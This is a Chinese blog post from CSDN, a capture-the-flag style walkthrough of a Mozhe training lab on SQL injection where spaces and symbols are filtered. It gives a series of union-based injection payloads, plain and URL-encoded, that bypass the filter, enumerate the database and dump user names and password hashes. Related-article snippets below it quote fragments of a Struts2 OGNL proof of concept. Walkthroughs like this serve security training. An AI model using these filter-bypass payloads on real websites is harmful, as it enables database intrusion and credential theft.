0x2F.SQL过滤字符后手工注入漏洞测试(第1题)

最新推荐文章于 2022-11-30 17:06:48 发布
最新推荐文章于 2022-11-30 17:06:48 发布
阅读量517 收藏
点赞数
分类专栏: 墨者学院 文章标签: 墨者学院 SQL注入 过滤字符
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_31679787/article/details/103070244
版权

经过测试,发现空格,符号等都被过滤,所以通过替换被过滤的符号并且进行url编码后才能继续注入;

测试列数;

/**/order/**/by/**/5#

%2f%2a%2a%2f%6f%72%64%65%72%2f%2a%2a%2f%62%79%2f%2a%2a%2f%35%23

以下级联查询需将id=1改为id=-1,才能显示级联后的查询内容;

测试显位点;

/**/union/**/select/**/1,2,3,4#

%2f%2a%2a%2f%75%6e%69%6f%6e%2f%2a%2a%2f%73%65%6c%65%63%74%2f%2a%2a%2f%31%2c%32%2c%33%2c%34%23

爆数据库名;

/**/union/**/select/**/1,database(),3,4#

%2f%2a%2a%2f%75%6e%69%6f%6e%2f%2a%2a%2f%73%65%6c%65%63%74%2f%2a%2a%2f%31%2c%64%61%74%61%62%61%73%65%28%29%2c%33%2c%34%23

爆表名;

/**/union/**/select/**/1,group_concat(table_name),3,4/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/"mozhe_discuz_stormgroup"#

%2f%2a%2a%2f%75%6e%69%6f%6e%2f%2a%2a%2f%73%65%6c%65%63%74%2f%2a%2a%2f%31%2c%67%72%6f%75%70%5f%63%6f%6e%63%61%74%28%74%61%62%6c%65%5f%6e%61%6d%65%29%2c%33%2c%34%2f%2a%2a%2f%66%72%6f%6d%2f%2a%2a%2f%69%6e%66%6f%72%6d%61%74%69%6f%6e%5f%73%63%68%65%6d%61%2e%74%61%62%6c%65%73%2f%2a%2a%2f%77%68%65%72%65%2f%2a%2a%2f%74%61%62%6c%65%5f%73%63%68%65%6d%61%2f%2a%2a%2f%6c%69%6b%65%2f%2a%2a%2f%22%6d%6f%7a%68%65%5f%64%69%73%63%75%7a%5f%73%74%6f%72%6d%67%72%6f%75%70%22%23

爆列名;

/**/union/**/select/**/1,group_concat(column_name),3,4/**/from/**/information_schema.columns/**/where/**/table_name/**/like/**/"stormgroup_member"#

%2f%2a%2a%2f%75%6e%69%6f%6e%2f%2a%2a%2f%73%65%6c%65%63%74%2f%2a%2a%2f%31%2c%67%72%6f%75%70%5f%63%6f%6e%63%61%74%28%63%6f%6c%75%6d%6e%5f%6e%61%6d%65%29%2c%33%2c%34%2f%2a%2a%2f%66%72%6f%6d%2f%2a%2a%2f%69%6e%66%6f%72%6d%61%74%69%6f%6e%5f%73%63%68%65%6d%61%2e%63%6f%6c%75%6d%6e%73%2f%2a%2a%2f%77%68%65%72%65%2f%2a%2a%2f%74%61%62%6c%65%5f%6e%61%6d%65%2f%2a%2a%2f%6c%69%6b%65%2f%2a%2a%2f%22%73%74%6f%72%6d%67%72%6f%75%70%5f%6d%65%6d%62%65%72%22%23

爆数据;

/**/union/**/select/**/1,group_concat(name,password),3,4/**/from/**/stormgroup_member#

%2f%2a%2a%2f%75%6e%69%6f%6e%2f%2a%2a%2f%73%65%6c%65%63%74%2f%2a%2a%2f%31%2c%67%72%6f%75%70%5f%63%6f%6e%63%61%74%28%6e%61%6d%65%2c%70%61%73%73%77%6f%72%64%29%2c%33%2c%34%2f%2a%2a%2f%66%72%6f%6d%2f%2a%2a%2f%73%74%6f%72%6d%67%72%6f%75%70%5f%6d%65%6d%62%65%72%23

Md5解码后得到密码;

登录得到key;

半情调
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
IDF实验室:天罗地网--超简单的js
Shinukami's Space
05-25 2674
地址: ctf.idf.cn/index.php?g=game&m=article&a=index&id=42 目: http://ctf.idf.cn/game/web/42/index.php 打开网页,显示一个输入框和一个提交按钮,直接查看源代码,发现有用的地方: var p1 = '%66%75%6e%63%74%69%6f%6e%20%63%68%65%63%
破解JS加密:url unicode加密而已
dianlei9877的博客
11-25 2281
加密所在的地方:http://tool.chinaz.com/Tools/UrlCrypt.aspx?url=www.baidu.com 结果:     http://%77%77%77%2E%62%61%69%64%75%2E%63%6F%6D/ 替换:http://\x77\x77\x77\x2E\x62\x61\x69\x64\x75\x2E\x63\x6F\x6D/查看:在地址栏...
完整ASCII字符
zmq5411的专栏
03-21 3950
 ASCII(美国信息交换标准编码)表字符ASCII代码字符ASCII代码字符ASCII代码二进制十进制十六进制二进制十进制十六进制二进制十进制十六进制回车ESC空格!"#$0001101001101101000000100001010001001000110100100132732333435360D1B2021222324 ?@ABCDE0111111100000010000011000010100001110001001000101636465666768693
常用ASCII URL编码对照表,JavaScript中如何把url的%20、%22、%28、%29、%7B、%7D解析还原成真实的字符
热门推荐
青颜的天空的博客
07-28 24万+
由于url支持26个英文字母、数字和少数几个特殊字符,因此,对于url中包含非标准url的字符时,就需要对其进行编码。
CTF-SQL过滤字符手工注入漏洞测试(第1)
asd158923328的博客
08-21 985
根据SQL注入原理:SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。 进入环境,加’ 和 -1 1+0页面发生变化,返回页面不存在,或者显错,存在注入点 进一步发现,空格和‘=’也被过滤掉了 所以‘=’可以用Like 替...
墨者_SQL过滤字符手工注入漏洞测试(第3)
weixin_50698958的博客
10-12 369
靶场: https://www.mozhe.cn/bug/detail/ZVBYR3I3eG9USnpIT0xqaDdtR09SQT09bW96aGUmozhe 背景介绍 安全工程师"墨者"最近在练习搭建一个采购系统,为了安全起见,“墨者”对该系统做了部分防护措施,请你帮助他测试系统是否安全。 实训目标 1、掌握SQL注入原理; 2、了解手工注入的方法; 3、了解MySQL的数据结构; 4、了解SQL注入常用注释字符; 5、了解sql注入常用绕过姿势; 解方向 手工进行SQL注入测试
C#实现过滤sql特殊字符的方法集合
09-03
在C#中,防止SQL注入攻击的一个重要方法是过滤SQL特殊字符SQL注入是一种常见的网络安全威胁,通过在用户输入的数据中插入恶意SQL语句,攻击者可以操纵数据库,获取、修改或删除敏感信息。以下是一些C#中过滤SQL...
0x01.第一课 Metaspoilt漏洞利用命令详解.pdf
06-24
0x01.第一课 Metaspoilt漏洞利用命令详解.pdf
Discuz7.2版的faq.php SQL注入漏洞分析
12-18
1. **参数过滤**:对所有用户输入进行严格的过滤和验证,特别是那些可以影响SQL查询的参数。 2. **预编译语句**:使用预编译的SQL语句(如PHP的PDO或MySQLi的预处理语句),可以有效防止SQL注入。 3. **最小权限原则...
写一个字符串和数组互转小工具,将11223344AABB6677等字符串转化成0X11,0X22,0X33....0X77
最新发布
04-12
写一个字符串和数组互转小工具,将11223344AABB6677等字符串转化成0X11,0X22,0X33....0X77
php is_numberic函数造成的SQL注入漏洞
09-04
例如,如果攻击者构造一个16进制的字符串"0x31206f722031",它在转换为十进制后仍然是"1 or 1",这在SQL查询中将导致不受控制的条件满足,从而可能引发二次注入。 三、解决方案 1. **参数化查询/预编译语句**:...
苹果新专利:可将屏幕对比度提升1000倍!
心有飞翔翔翔翔翔
06-24 282
腾讯数码讯(编译:Rabbit)苹果本周四通过了一项新专利,这项专利可以通过双层LCD显示屏来提升HDR画面的质量,理论上可以将显示屏对比度提升到1000000:1。 根据美国专利商标局的文件来看,这项专利介绍了双层HDR图像的显示方法,通过双层LCD屏幕的光学效应系统来提高图像的对比度。简单的说,传统的LCD显示屏通过液晶层来调整光线的通过率,而不同过的电压被应用到当个像素电极改变液晶分子
ASCII字符与URL编码的对照表
Jollyzhe的博客
08-21 16万+
ASCII字符 URL编码 ÿ %FF 空格 %20 ! %21 " %22 # %23 $ %24 % %25 & %26 ’ %27 ( %28 ) %29 * %2A + %2B , %2C - %2D . %2E / %2F 0 %30 1 %31 2 %32 3 %33 4 %34 5 %35 6 %36 7 %37 8 %38 9 %39 : %3A ; %3B...
c语言中%3ccr%3e有啥作用,Redis安全学习
weixin_33905037的博客
05-16 665
Redis安全学习一直在听SSRF打Redis,那Redis到底是啥,正式的认真学习一下。1、Redis是什么REmote DIctionary Server(Redis) 是一个由Salvatore Sanfilippo写的key-value存储系统。Redis是一个开源的使用ANSI C语言编写、遵守BSD协议、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的...
汽车诊断之UDS入门-0x2F服务
weixin_44842720的博客
11-30 1634
0x2F InputOutControlByIdentifier 服务
笔记:SQL过滤字符手工注入漏洞测试(第1)
m0_67399862的博客
05-26 527
一打开网页时,发现正常打and 1=1的语句都被过滤了 考虑空格被过滤 将空格用/**/表示转换为URL时,发现语句仍报错,考虑有可能是等号被过滤 将=用like表示转换为URL 相当于输入了and 1=1的语句,页面正常 相当于输入了and 1=2的语句,发现页面报错,说明有SQL注入 用order by语句查询字段数 说明字段数只有4个 发现语句没有拼接在一起 将id=1改为id=-1 接下来按常规的爆库,爆表,...
墨者SQL过滤字符手工注入漏洞测试(第1)
wswr的博客
03-12 1942
思路:注入嘛,那就是该试的都试试,然后你会发现单引号页面跳转了虽然没有和之前一样有sql报错什么的,而且空格order,by ,select什么的字符都被过滤 那么就是要用url编码的方式去绕过滤,值得注意的是空格用/**/代替,=用like代替 简单说就是和正常注入的不同的地方就是每一步注入的代码都要换成url编码的形式再去注入,然后就和正常注入没什么区别了 ps:这里其实一开始我也没什么思路的QAQ,然后就无脑sqlmap了,后面会发现sqlmap抛出来的账号密码都不行,所以还是得手注可恶 总结
0x21.Apache Struts2远程代码执行漏洞(S2-007)复现
qq_31679787的博客
10-16 4359
s2-007:当配置了验证规则,类型转换出错时,进行了错误的字符串拼接,进而造成了OGNL语句的执行; 抓包,在age值处输入poc; poc:'+(#application)+' 判断出在age输入框存在s2-007漏洞; 输入poc查找key文件位置,得到key值; poc:%27+%2B+%28%23_memberAccess%5B%22allowStaticMethodAccess%...
0x5.b6p12的%转换字符
07-14
`0x5.b6p12` 是 C 语言中表示十六进制浮点数的格式。对于这种情况,可以使用 `%a` 或 `%A` 转换字符来格式化输出。其中,`%a` 将指数部分以小写字母表示,而 `%A` 则以大写字母表示。所以,`0x5.b6p12` 的转换字符...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值